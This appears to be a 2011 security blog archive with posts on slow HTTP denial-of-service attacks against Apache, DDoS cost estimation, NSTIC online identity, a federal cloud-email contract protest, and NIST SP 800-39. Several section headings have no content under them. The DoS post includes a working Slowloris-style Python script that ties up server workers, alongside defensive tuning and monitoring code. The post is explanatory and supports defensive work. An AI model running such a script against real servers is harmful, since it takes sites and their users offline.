Noms and IKANHAZFIZMA
Posted August 26th, 2011 by rybolov
Kickin’ it old-school with some kitteh overflows
Posted in IKANHAZFIZMA | No Comments »
Tags: infosec • lolcats • pwnage • security
When most people think about Denial of Service attacks nowadays, they picture the Anonymous kids running their copy of LOIC in a hivemind or Russian gangsters building a botnet to run an online protection racket. But there is a newish attack technique floating around that I believe will become more important over the next year or two: slow HTTP attacks.
How a Slow DoS Works
Webservers run an interesting flavor of process management. When you start an Apache server, it starts a master process that spawns a number of listener processes (or threads), as defined by StartServers (5-10 is a good starting number). Each listener serves a number of requests, defined by MaxRequestsPerChild (1000 is a good number here), and then dies and is replaced by a fresh process/thread from the master. This is done so that any application that leaks memory gets recycled before the leak gets out of hand. As more requests come in, more processes/threads are spawned, up to the MaxClients setting. MaxClients is designed to throttle the number of processes so that Apache doesn’t forkbomb and the OS doesn’t become unmanageable because it’s thrashing to swap. There are also some rules for reaping idle processes, but those are immaterial to what we’re trying to do today.
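As an aside on tuning, here is a minimal sketch of the common rule of thumb for sizing MaxClients so the box never swaps: divide the RAM you can spare for Apache by the average size of one child process. Every number below is a hypothetical placeholder; measure your own server before trusting it.

```python
# Rough MaxClients sizing sketch for a prefork-style Apache.
# Rule of thumb: MaxClients ~= (RAM you can spare for Apache) / (avg child size).
# All figures below are hypothetical placeholders -- measure your own box.

ram_total_mb = 4096        # total RAM on the server
ram_reserved_mb = 1024     # OS, database, caches, everything that isn't Apache
avg_child_mb = 25          # typical resident size of one Apache child (check ps/top)

max_clients = (ram_total_mb - ram_reserved_mb) // avg_child_mb
print(f"MaxClients should stay at or below ~{max_clients}")
# If MaxClients is set higher than this, a slow DoS (or a plain traffic spike)
# pushes the box into swap before Apache ever hits its own limit.
```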
What happens in a slow DoS is that the attack tool sends an HTTP request that never finishes. Each listener process that picks up one of these connections is tied up indefinitely and never works through its MaxRequestsPerChild quota, so it never dies. By sending a small number of never-completing requests, the attacker gets Apache to gladly spawn new processes/threads up to MaxClients, at which point it stops answering requests and the site is DoS’ed. The faster listeners get tied up, the faster the server stops answering. For a poorly tuned webserver configuration with MaxClients set too high, the server starts thrashing to swap before it even hits MaxClients; to top it off, the box becomes unresponsive even to ssh connections and needs a hard boot.
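For the curious, here is roughly what the never-finishing request looks like in practice: a minimal sketch in the spirit of tools like Slowloris, for poking at a test server you own. It opens a handful of connections, sends a partial set of headers, and then trickles one bogus header line every few seconds so the request never completes and the listener serving it never frees up. The target, port, and counts are all placeholders.

```python
import socket
import time

# Minimal illustration of a never-finishing HTTP request (Slowloris-style).
# Point it ONLY at a test server you own; target, port, and counts are placeholders.
TARGET = "127.0.0.1"
PORT = 80
CONNECTIONS = 50         # a full DoS needs roughly MaxClients of these
TRICKLE_INTERVAL = 10    # seconds between bogus header lines

def open_slow_connection():
    """Open a socket and start an HTTP request that deliberately never completes."""
    s = socket.create_connection((TARGET, PORT), timeout=5)
    s.send(b"GET / HTTP/1.1\r\nHost: " + TARGET.encode() + b"\r\n")
    return s

sockets = [open_slow_connection() for _ in range(CONNECTIONS)]

while True:              # Ctrl-C to stop
    time.sleep(TRICKLE_INTERVAL)
    for s in sockets:
        # One more header line keeps the request "in progress", so the listener
        # handling it never frees up. A real test would also re-open any
        # sockets the server manages to drop.
        s.send(b"X-a: b\r\n")
```

Note how little bandwidth this takes; that is the whole point of the technique.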
The beauty of this is that the theoretical minimum number of requests to make a server hang for a well-tuned Apache is equal to MaxClients. This attack can also take out web boundary devices: reverse proxies, Web Application Firewalls, Load Balancers, Content Switches, and anything else that receives HTTP(S).
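Because saturation happens right at MaxClients, one cheap way to see it coming is to poll Apache’s mod_status scoreboard and alarm when busy workers approach that ceiling. A rough sketch, assuming mod_status is enabled and the machine-readable /server-status?auto page is reachable from wherever this runs (both are assumptions about your setup):

```python
import urllib.request

# Assumes mod_status is enabled and /server-status?auto is reachable from
# this host -- both are assumptions about your configuration.
STATUS_URL = "http://127.0.0.1/server-status?auto"
MAX_CLIENTS = 150        # mirror the MaxClients value from your httpd.conf
ALERT_THRESHOLD = 0.8    # warn when 80% of the workers are busy

with urllib.request.urlopen(STATUS_URL, timeout=5) as resp:
    status = resp.read().decode()

# The ?auto output is "Key: value" lines, including BusyWorkers and IdleWorkers.
fields = dict(line.split(": ", 1) for line in status.splitlines() if ": " in line)
busy = int(fields.get("BusyWorkers", 0))

if busy >= MAX_CLIENTS * ALERT_THRESHOLD:
    print(f"WARNING: {busy}/{MAX_CLIENTS} workers busy -- possible slow DoS in progress")
else:
    print(f"OK: {busy}/{MAX_CLIENTS} workers busy")
```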
Post photo by Salim Virji.
Advantages of Slow DoS Attacks
There are a couple of reasons why slow DoS tools are getting research and development attention this year, and why I see them growing in popularity.
Defenses
This part is fun, and by that I mean “it sucks”. There are some things that help, but there isn’t a single solution that makes the problem go away.
Posted in Cyberwar, DDoS, Hack the Planet, Technical | 7 Comments »
Tags: apache • ddos • infosec • pwnage • risk • scalability • security
So since I’ve semi-officially been granted the title of “The DDoS Kid” after some of the incident response, analysis, and talks that I’ve done, I’m starting to get asked a lot about how much the average DDoS costs the targeted organization. I have some ideas on this, but the simplest approach is to recycle Business Continuity/Disaster Recovery figures with some small twists.
Scoping:
Direct:
Indirect:
Brand damage (these costs vary from industry to industry and from attack to attack):
Note that it’s reasonably easy to create example costs for small, medium, and large attacks and do planning around a medium-sized attack.
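As a rough illustration of that kind of back-of-the-envelope exercise, here is a minimal sketch that rolls up direct and indirect costs for small, medium, and large attack scenarios. Every figure in it is a made-up placeholder; the whole point is to substitute your own BCP/DR numbers.

```python
# Back-of-the-envelope DDoS cost model -- all figures are hypothetical
# placeholders; substitute your own BCP/DR numbers.

REVENUE_PER_HOUR = 10_000      # direct: lost sales/transactions while down
STAFF_COST_PER_HOUR = 1_500    # direct: ops and incident-response labor
MITIGATION_FLAT_COST = 5_000   # direct: scrubbing service, emergency bandwidth
BRAND_DAMAGE_FACTOR = 0.25     # indirect: fraction of direct cost, varies wildly

# Example outage durations (hours) for small, medium, and large attacks
scenarios = {"small": 2, "medium": 8, "large": 24}

for name, hours in scenarios.items():
    direct = hours * (REVENUE_PER_HOUR + STAFF_COST_PER_HOUR) + MITIGATION_FLAT_COST
    indirect = direct * BRAND_DAMAGE_FACTOR
    print(f"{name:>6}: direct ${direct:,.0f}, indirect ~${indirect:,.0f}, "
          f"total ~${direct + indirect:,.0f}")
```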
However, while we can recycle BCP/DR figures for the outage itself, mitigating the attack is a different exercise:
Posted in DDoS, Risk Management, Technical | No Comments »
Tags: ddos • infosec • moneymoneymoney • pwnage • scalability • security
OK, NSTIC has been out a couple of months now, with the usual “ZOMG it’s RealID all over again” worry-mongers raising their heads.
So we’re going to go through what NSTIC is and isn’t and some “colorful” (or “off-color” depending on your opinion) use cases for how I would (hypothetically, of course) use an Identity Provider under NSTIC.
The Future Looks Oddly Like the Past
There are already identity providers out there doing part of NSTIC: Google Authenticator, Microsoft Passport, Facebook Connect, even OpenID fits into part of the ecosystem. My first reaction after reading the NSTIC plan was that the Government was letting the pioneers in the online identity space take all the arrows and would then swoop in to save the day with a standardized plan for the providers to do what they’ve been doing all along, plus some compatibility between them. I was partially right: NSTIC is the Government looking at what already exists in the market and helping to grow those capabilities by providing support in the form of standardization and community management. And that has been the plan all along, but it makes sense: would you rather have experts build the basic system and then have the Government adopt the core pieces as the technology standard, or would you rather have the Government clean-room a standard and a certification scheme and push it out there for people to use?
Not RealID Not RealID Not RealID
Many people think that NSTIC is RealID by another name. Aaron Titus did a pretty good job of debunking some of these hasty conclusions. The interesting thing about NSTIC for me is that users can pick which identity or persona they use for a particular purpose. In that sense, it actually gives the public a better set of tools for determining how they are represented online and for keeping these personas separate. For those of you who haven’t seen the list of organizations that were consulted on NSTIC, their number includes the EFF and the Center for Democracy and Technology (BTW, donate some money to both of them, please). A primary goal of NSTIC is to help website owners verify that their users are who they say they are while still giving users a set of privacy controls.
Stick in the Mud photo by jurvetson.
Now on to the use cases; I hope you like them:
I have a computer at home. I go to many websites where I have my public persona, Rybolov the Hero, the Defender of all Things Good and Just. That’s the identity that I use to log into my official FaceBook account, use teh Twitters, log into LinkedIn–basically any social networking and blog stuff where I want people to think I’m a good guy.
Then I use a separate, non-publicized NSTIC identity to do all of my online banking. That way, if somebody manages to “gank” one of my social networking accounts, they don’t get any money from me. If I want to get really paranoid, I can use a separate NSTIC ID for each account.
At night, I go creeping around trolling on the Intertubes. Because I don’t want my “Dudley Do-Right” persona to be sullied by my dark, emoting, impish underbelly or to get an identity “pwned” that gives access to my bank accounts, I use the “Rybolov the Troll” NSTIC ID. Or hey, I go without using a NSTIC ID at all. Or I use an identity from an identity provider in a region *cough Europe cough* that has stronger privacy regulations and is a couple of jurisdiction hops away but is still compatible with NSTIC-enabled sites because of standards.
Keys to Success for NSTIC:
Internet users have a choice: You pick how you present yourself to the site.
Website owners have a choice: You pick the NSTIC ID providers that you support.
Standards: NIST just formalizes and adopts the existing standards so that they’re not controlled by one party. They use the word “ecosystem” in the NSTIC description a lot for a reason.
Posted in NIST, Technical | Comments Off on Realistic NSTIC
Tags: anonymity • compatibility • government • infosec • infosharing • management • NIST • nstic • scalability • security
Interesting blog post on Microsoft’s TechNet, but the real gem is the case filing and summary from the DoJ (usual .pdf caveat applies). Basically, the Reader’s Digest Condensed Version is that the Department of the Interior awarded a cloud services contract to Microsoft for email. The award was protested by Google for a wide variety of reasons; you can go read the full thing for all the whinging.
But this is the interesting thing to me even though it’s mostly tangential to the award protest:
So this is where I start thinking. I thunk until my thinker was sore, and these are the conclusions I came to:
And then there’s the “back story”: the Cobell case and how Interior was disconnected from the Internet several times and for several years. The Rybolov interpretation is that if Google’s government cloud potentially has tribes as a tenant, it increases the risk to Interior (both in terms of data security and just plain politically) beyond what they are willing to accept.
Obligatory Cloud photo by jonicdao.
Posted in FISMA, NIST, Outsourcing | 2 Comments »
Tags: 800-37 • 800-53 • accreditation • certification • cloud • cloudcomputing • compliance • fisma • government • infosec • management • NIST • risk • security
You should have seen Special Publication 800-39 (PDF file; also check out more info on Fismapedia.org) by now. Dan Philpott and I just taught a class on understanding the document and how it affects security managers out there doing their jobs on a daily basis. While the information is still fresh in my head, I thought I would jot down some notes that might help everybody else.
The Good:
NIST is doing some good stuff here, trying to get IT Security and Information Assurance out of the “It’s the CISO’s problem, I have effectively outsourced any responsibility through the org chart” mindset and into more of what DoD calls “mission assurance”. That is, how do we go from point-in-time vulnerabilities (i.e., things that can be scored with CVSS or tested through Security Test and Evaluation) to briefing executives on the risk to their organization (Department, Agency, or even business) coming from IT security problems? It lays out an organization-wide risk management process and a framework (layer cakes within layer cakes) to share information up and down the organizational stack. This is very good, and getting the mission/business/data/program owners to recognize their responsibilities is an awesome thing.
The Bad:
SP 800-39 is good in philosophy, with a general theme of the non-IT “business owners” taking ownership of risk, but when it comes to specifics it raises more questions than it answers. For instance, it defines a function known as the Risk Executive. As practiced today by people who “get stuff done”, the Risk Executive is like a board made up of the Business Unit owners (possibly as the Authorizing Officials), the CISO, and maybe a Chief Risk Officer or other senior executives. But without that context, and without asking around to find out what people are doing to get executive buy-in, the Risk Executive seems like a bit of a non sequitur. There are other things like that, but I think the best summary is “Wow, this is great, now how do I take this guidance and execute a plan based on it?”
The Ugly:
I have a pretty simple yardstick for evaluating any kind of standard or guideline: will this be something that my auditor will understand, and will it help them help me? With 800-39, I think it is written so abstractly that most auditor-folk would have a hard time translating it into something they could audit against. This is both a blessing and a curse, and the huge recommendation I have is that you brief your auditor beforehand on what 800-39 means to them and how you’re going to incorporate the guidance.
Posted in FISMA, NIST, Risk Management, What Works | 5 Comments »
Tags: 800-37 • 800-39 • accreditation • assurance • auditor • C&A • certification • comments • compliance • datacentric • fisma • government • infosec • management • NIST • risk • scalability • security